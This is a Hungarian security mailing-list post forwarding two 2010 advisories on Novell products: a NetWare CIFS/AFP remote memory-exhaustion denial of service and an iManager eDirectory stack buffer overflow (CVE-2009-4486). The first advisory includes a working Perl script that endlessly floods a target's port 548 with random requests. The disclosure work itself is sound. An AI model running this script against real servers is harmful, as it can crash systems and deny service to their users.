[guru] Novell biztonsagi frissitesek
DATE: Tue, 12 Jan 2010 18:27:10 +0100
A Novell Netware CIFS.NLM és AFPTCP.NLM moduljai memleak-eket tartalmaz,
megfelelően preparált kérésekkel DoS-olhatóak.
A Novell iManager eDirectory schéma import/export plugin-ja stack buffer
overflow hibát tartalmaz.
--- Begin Message ---
#####################################################################################
Application: Novell Netware CIFS And AFP Remote Memory Consumption DoS
Platforms: Novell Netware 6.5 SP8
Crash: YES
Exploitation: Remote DoS
Date: 2009-12-21
Author: Francis Provencher (Protek Research Lab's)
Blog: http://protekresearch.blogspot.com/
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
#####################################################################################
===============
1) Introduction
===============
Novell,Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse.
Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.
(http://en.wikipedia.org/wiki/Novell)
#####################################################################################
============================
2) Report Timeline
============================
2009-12-21 Vendor Contact
2009-12-22 Vendor Recontact
2009-12-29 Vendor Recontact
2010-01-05 Disclosure of this advisory
#####################################################################################
============================
3) Technical details
============================
CIFS.nlm Semantic Agent (Build 163 MP)
Version 3.27 November 13, 2008
AFPTCP.nlm Build 163 SP
Version 3.27 November 13, 2008
The CIFS and AFP protocols have a memory consumption problem when their received lot's of malformed arbitrary requests on their respective
services. Sending arbitrary crafted requests to these services will
consumme all the memory available, create multiples abends and finally crash the whole server..... It could take couple of minutes to hours (Depend of the memory available on the server ).
#####################################################################################
===========
4) The Code
===========
#!/usr/bin/perl
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Novell Netware CIFS.nlm Remote Memory Consumption Denial of Service
# Here is a modified version from the script written by the researcher Jeremy Brown
# http://jbrownsec.blogspot.com/2009/12/writing-code-that-breaks-code.html
#
use IO::Socket;
use String::Random;
$target = $ARGV[0];
$port = 548;
$protocol = tcp;
$maxsize =
666;
$random =
0;
if((!defined($target) || !defined($port) || !defined($protocol) || !defined($maxsize)))
{
print "usage: $0 <target> \n";
exit;
}
while(1)
{
$sock = IO::Socket::INET->new(Proto=>$protocol, PeerHost=>$target, PeerPort=>$port)
or logit();
$rand = new String::Random;
$random = $rand->randpattern("." x rand($maxsize)) . "\r\n\r\n";
$sock->send($random);
close($sock);
}
#####################################################################################
(PRL-2009-27)
__________________________________________________________________
Looking for the perfect gift? Give the gift of Flickr!
http://www.flickr.com/gift/
--- End Message ---
--- Begin Message ---
ZDI-10-001: Novell iManager eDirectory Plugin Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-001
January 7, 2010
-- CVE ID:
CVE-2009-4486
-- Affected Vendors:
Novell
-- Affected Products:
Novell iManager
-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Novell iManager. Authentication is not
required to exploit this vulnerability.
The flaw exists in an application called by the iManager in order to
handle importing/exporting of schema information. While
importing/exporting from the schema, the sub-application fails to
validate the length of its arguments while copying user-supplied data
into statically allocated stack buffer. This can result in code
execution under the privileges of the application.
-- Vendor Response:
Novell has issued an update to correct this vulnerability. More
details can be found at:
http://www.novell.com/support/viewContent.do?externalId=7004985&sliceId=1
-- Disclosure Timeline:
2009-03-26 - Vulnerability reported to vendor
2010-01-07 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* 1c239c43f521145fa8385d64a9c32243
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
--- End Message ---